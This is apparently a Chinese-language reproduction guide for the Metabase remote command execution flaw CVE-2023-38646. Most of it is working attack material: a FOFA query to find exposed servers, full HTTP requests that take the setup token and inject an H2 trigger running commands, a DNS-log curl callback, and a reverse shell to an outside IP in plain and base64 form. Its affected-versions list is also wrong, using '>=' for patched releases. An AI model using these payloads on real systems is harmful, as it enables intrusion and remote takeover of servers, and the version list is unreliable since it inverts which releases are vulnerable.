Metabase 远程命令执行漏洞(CVE-2023-38646)
一、漏洞简介
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令。
二、影响版本
- Metabase open source >= 0.46.6.1
- Metabase Enterprise >= 1.46.6.1
- Metabase open source >= v0.45.4.1
- Metabase Enterprise >= v1.45.4.1
- Metabase open source >= v0.44.7.1
- Metabase Enterprise >= v1.44.7.1
- Metabase open source >= v0.43.7.2
- Metabase Enterprise >= v1.43.7.2
三、资产测绘
- fofa
app="Metabase" - 特征
四、漏洞复现
- 获取token
GET /api/session/properties HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Host: 3.20.6.77
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
- 使用上一步获取的token
POST /api/setup/validate HTTP/1.1
Host: 3.20.6.77
Connection: close
Content-Length: 241
sec-ch-ua: "Not/A)Brand";v="99", "Brave";v="115", "Chromium";v="115"
Accept: application/json
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: zh-CN,zh;q=0.5
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Cookie: metabase.DEVICE=7be0100b-9a8e-46d5-98dd-e9086e16fcf0
{
"token": "ad584d85-31ab-4c05-aa1f-8a0e8518a318",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl pb17no.dnslog.cn')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
- 反弹shell
bash -i >& /dev/tcp/172.245.154.22/7777 0>&1base64
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjQ1LjE1NC4yMi83Nzc3ICAwPiYx}|{base64,-d}|{bash,-i}POST /api/setup/validate HTTP/1.1
Host: 3.20.6.77
Connection: close
Content-Length: 241
sec-ch-ua: "Not/A)Brand";v="99", "Brave";v="115", "Chromium";v="115"
Accept: application/json
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: zh-CN,zh;q=0.5
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Cookie: metabase.DEVICE=7be0100b-9a8e-46d5-98dd-e9086e16fcf0
{
"token": "ad584d85-31ab-4c05-aa1f-8a0e8518a318",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjQ1LjE1NC4yMi83Nzc3ICAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
